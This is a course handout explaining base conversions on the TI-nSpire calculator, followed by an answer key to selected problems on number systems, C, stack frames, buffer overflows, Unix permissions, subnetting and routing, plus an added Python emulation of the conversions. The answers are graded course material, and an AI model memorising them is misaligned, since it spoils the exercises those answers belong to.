To access this character you need to bring up the symbol palette on your calculator. You do that by pressing and releasing the ctrl key, followed by pressing and releasing the symbol palette key. The symbol palette will then pop up.
The keys and the palette are identified in the picture below.

[figure: calculator keypad, with labels: ctrl key, symbol palette key, conversion operator, symbol palette]

You select the conversion operator by pressing the enter key. The operator will then show up in your display. That seems like a lot of steps for a single character, but it's not too bad. Once you've selected the operator for the first time, the nSpire calculator remembers that position on the symbol palette. Hereafter, to select the conversion operator you simply press these three keys one after the other: ctrl, symbol palette, enter.

For the remainder of this document, I'll use ► as shorthand for "press ctrl, symbol palette, enter."

4. Performing Conversions

Now we're ready to put this to good use. Let's jump right in using some of the examples from the first lecture. I'll use this notation, [enter], to mean "press the enter key".

Problem: Express the binary number 0b110110 as a decimal number.
Type: 0b110110 [enter]
Solution: 54

Because the calculator is set up to perform Auto calculations in the Decimal number system, we don't have to use the conversion operator in this example. Simply typing a number in binary (with the leading "0b") and pressing enter will tell the nSpire to output the result in decimal. Note, if you leave off the leading "0b" and type this: 110110 [enter], the nSpire will output 110110. That's because the calculator assumes you entered one hundred ten thousand, one hundred and ten (the decimal number).

Problem: Convert the decimal number 148 to binary.
Type: 148 ► base2 [enter]
Solution: 0b10010100

Here we learn how to tell the nSpire that we want to convert to some other base besides decimal by typing the characters "base2". Note, the nSpire will capitalize the "b" in "base2" for you and redisplay your input as: 148►Base2

Problem: Express the hexadecimal number 0x3CB as a decimal number.
Type: 0h3cb [enter]
Solution: 971

Remember, absent any specified base the nSpire defaults all results to decimal. Also, you will usually see hexadecimal numbers written with the "0x" prefix in this class. Just remember that the nSpire expects to see "0h" as the prefix for hexadecimal numbers.

Problem: Convert the decimal number 2576 to hexadecimal.
Type: 2576 ► base16 [enter]
Solution: 0hA10

Problem: Convert the hexadecimal number 0x13F to binary.
Type: 0h13f ► base2 [enter]
Solution: 0b100111111

Problem: Convert the binary number 0b110101001 to hexadecimal.
Type: 0b110101001 ► base16 [enter]
Solution: 0h1A9

Simple calculations are great, but the real power comes in more complex calculations. That's because you can write statements with calculations on the left side of the conversion operator symbol (►). Let's look at an example:

Problem: A section of memory beginning at address 0xD213AC53 contains 438 bytes of data (one byte of data per address line). The address space looks like this:

    Address       Data
    0xD213AC53    45
    0xD213AC54    88
    0xD213AC55    3C
    0xD213AC56    E2
    ...           ...

What hexadecimal memory address comes next after the end of the 438 bytes of data?
Type: 0hd213ac53 + 438 ► base16 [enter]
Solution: 0hD213AE09

For these examples I used "0x" in the problem statement and "0h" in the calculations on purpose. Remember, the nSpire needs to see the "0h" prefix to represent hexadecimal numbers, but you'll often see it written in problems as "0x". If you make a mistake and type 0xd213ac53 it will be obvious because the nSpire will assume you want to multiply zero (0) times xd213ac53 and will show you that the result equals zero (0).

After a little practice you'll get the hang of it and find that you can perform very complex calculations in different bases quite easily.

Answers to Selected Problems

Chapter 1

Problem 6: The hard drive.

Problem 9.
Writing the value of the position below each bit we have

     1    0    0    0    0    0
    32   16    8    4    2    1

The only position that has a bit value of 1 is the position corresponding to 32. Thus 100000₂ = 32₁₀.

Problem 10. 10101₂ = 21₁₀.

Problem 13. 78₁₀ = 1001110₂.

Problem 16. 0x27 is equivalent to 39 in base-10.

Problem 18. 0x100 is 100000000 in binary.

Problem 21. Since the first hexadecimal digit is C, the first four bits are 1100. Thus, the fourth bit is a zero. Note how much more difficult this question would have been if the address had been provided in base-10 instead of in base-16.

Problem 26. 0x8D4.

Problem 29.
16 into 730 gives a quotient of 45 with a remainder of A.
16 into 45 gives a quotient of 2 with a remainder of D.
16 into 2 gives a quotient of 0 with a remainder of 2.
Thus, 730₁₀ = 0x2DA. Since we are asked to use the number of hex digits appropriate for the x86 architecture, we must use 8 hex digits. Thus, the final answer is 0x000002DA.

Chapter 2

Problem 2.

    #include <stdio.h>

    int main(void)
    {
        float tempF, tempC;

        printf("Please enter your Fahrenheit temperature: ");
        scanf("%f", &tempF);
        tempC = (5.0 / 9.0) * (tempF - 32.0);
        printf("The equivalent Celsius temperature is %f.\n", tempC);
        return 0;
    }

Problem 6. (a) Machine code (b) High-level code (c) Assembly code

Chapter 3

Problem 1.

Problem 4. (a) Assembly language (b) This instruction takes the 4-byte value 0x08048484 and stores it in the memory location whose address is held in the esp register.

Problem 10. (a) 2 (b) Howitzer Torpedoes

Problem 11. (a) mov DWORD PTR [ebp-4],0x5 (b) ebp-4 = 0xbffff814 (c) 0x0804838b

Chapter 4

1. (a) string (b) char

5. C doesn’t check for or prevent access to an element outside the range of an array.

6. (a) 20 bytes (b) 7 (c) The (garbage) value stored in memory immediately below the array would be displayed.

Chapter 5

8. (e)

9. My teacher is LCDR Agood day by all!

Chapter 6

3. (d)

4.
    Address       Data   What is Represented   Stack Frame Info
    0xBFFFF810    11     g                     esp_main
    0xBFFFF811    00     g
    0xBFFFF812    00     g
    0xBFFFF813    00     g
    0xBFFFF814    42     fox[0]
    0xBFFFF815    00     fox[1]
    0xBFFFF816
    0xBFFFF817
    0xBFFFF818                                 ebp_main

Chapter 7

4. (a) No. (b) The program is writing more data into the buffer than it can hold, i.e., a buffer overflow. (c) 10 bytes (9 characters plus the NULL). (d) Increase the size of the buffer, or only copy five characters and stop (strncpy).

5. (a) 15 bytes of array + 4 bytes of int + 4 bytes of prev_ebp = 23 characters. Note that a NULL character is automatically appended to the end. (b) No, because year precedes the start of the buffer, as it is declared last. Therefore, if you write past the end of the buffer you will overwrite name_len, not year.

Chapter 8

5. Answer is (a).

Chapter 9

5. (a) atwood (b) read, execute (c) chmod o+x gethappy.exe followed by chmod o+r gethappy.exe (or, alternatively: chmod o=rx gethappy.exe).

6. (a) setuid (set user id) (b) When the user executes the file, they execute the file as the owner of the file.

Chapter 11

7.
    Application   __d__
    Transport     __b__
    Network       __e__
    Data Link     __a__
    Physical      __c__

Chapter 12

8. (a) 10 Mbps / 6 hosts equals approximately 1.67 Mbps per host (b) 10 Mbps / 4 hosts = 2.5 Mbps per host (c) 10 Mbps / 2 hosts = 5 Mbps per host

Chapter 13

5. Answer is (a).

6. (b) 83 78 a8 1f = 131.120.168.31

7. (a) 255.255.224.0 (b) 136.52.96.0 (c) 136.52.127.255 (d) 8192

8. Every packet is an independent entity, possibly traveling over different paths from source to destination.

10. 146.25.128.0

13. 32 ; 8 ; 0 ; 255

14. To extract the network ID from an IP address (or to extract the network address).

15. (a) 128.32.14.0 (b) 9 (c) 510 (d) 128.32.15.254

19. (a) True (b) True (c) False (d) False

20. The valid ones are (b), (d) and (e).

21. (a) 2^5 – 2 = 30 (b) 137.18.129.10000001 = 137.18.129.129 (c) 137.18.129.10011110 = 137.18.129.158 (d) 137.18.129.10011111 = 137.18.129.159

Chapter 15

5.
(a) Distance vector (b) Link state

6.
    Destination    A   B   C   D   E
    Next element   A   I   –   I   E
    Total cost     5   3   0   2   5

Chapter 16

6. The assumption is that each router can trust the information that other routers are sending it.

7. (a)-(c):

(d) No, the first and last IP addresses of the false network are 8.9.7.80 and 8.9.7.95, respectively. The web server’s IP address does not fall within that range. Thus, traffic destined for the website will not go to the attacker, but toward the web server as normal.

(e)
Solution #1, a simple plaintext password: added to all LSPs so each router can authenticate the information it is receiving.
Solution #2, an MD5 hash of the OSPF packet and a shared secret key: in OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers.
Solution #3, passive interface: once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface.

(f) The Network Administrator

Chapter 17

10. Scalability: routing tables would become huge. Administration: owners of individual networks may want to set their own rules for routing within their networks, without being concerned with what rules others are electing to follow.

11. San Fran: eBGP; Washington: neither; Paris: eBGP and iBGP; Bonn: neither

Chapter 18

5.

6. R4 BGP Path Table
    Networks         Next   AS
    N8, N9           R1     AS1, AS2
    N10, N11, N12    R1     AS1, AS3
    N13, N14, N15    R9     AS1, AS4

Total Cost: 3+3+3+1 = 10
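As a closing worked example for the nSpire conversion procedure in Section 4 above, here is a small Python emulation of that workflow (added here; it is not part of the EC310 notes and not code from the nSpire calculator). It reads operands with the calculator’s “0b” and “0h” prefixes, does the arithmetic on the left of ►, displays the result in the requested base, and reproduces the “0x” trap where a leading zero followed by a letter collapses to zero. The function names are my own.

```python
import re

# Added example, not from the EC310 notes or the nSpire firmware: a small
# emulation of the calculator's conversion workflow so the worked problems in
# Section 4 can be checked offline. Operand prefixes follow the calculator's
# convention: "0b" = binary, "0h" = hexadecimal, no prefix = decimal.

_PREFIXES = {"0b": 2, "0h": 16}

def parse_operand(token):
    """Read one operand the way the nSpire does: the prefix selects the base."""
    t = token.strip().lower()
    for prefix, base in _PREFIXES.items():
        if t.startswith(prefix):
            return int(t[len(prefix):], base)
    # "0x..." is not a prefix on the nSpire: a leading 0 followed by a letter is
    # read as zero times an unknown variable, so the value collapses to 0.
    if re.fullmatch(r"0[a-z][0-9a-z]*", t):
        return 0
    # No prefix at all: plain decimal, so "110110" is one hundred ten
    # thousand one hundred ten, not a binary number.
    return int(t, 10)

def format_result(value, base):
    """Display as the calculator would: 0b..., 0h... (upper case), or decimal."""
    if base == 2:
        return "0b" + format(value, "b")
    if base == 16:
        return "0h" + format(value, "X")
    return str(value)

def convert(expression, base=10):
    """Evaluate a sum/difference of mixed-base operands and show it in `base`,
    i.e. 'expression ► baseN [enter]' (base 10 means no operator at all)."""
    total = 0
    # Each operand carries its own optional sign; the calculator does the
    # arithmetic in the left-hand expression before converting the result.
    for sign, token in re.findall(r"\s*([+-]?)\s*([0-9a-zA-Z]+)", expression):
        value = parse_operand(token)
        total += -value if sign == "-" else value
    return format_result(total, base)

if __name__ == "__main__":
    # The memory-address problem from Section 4: 438 bytes past 0xD213AC53.
    print(convert("0hd213ac53 + 438", 16))  # 0hD213AE09
```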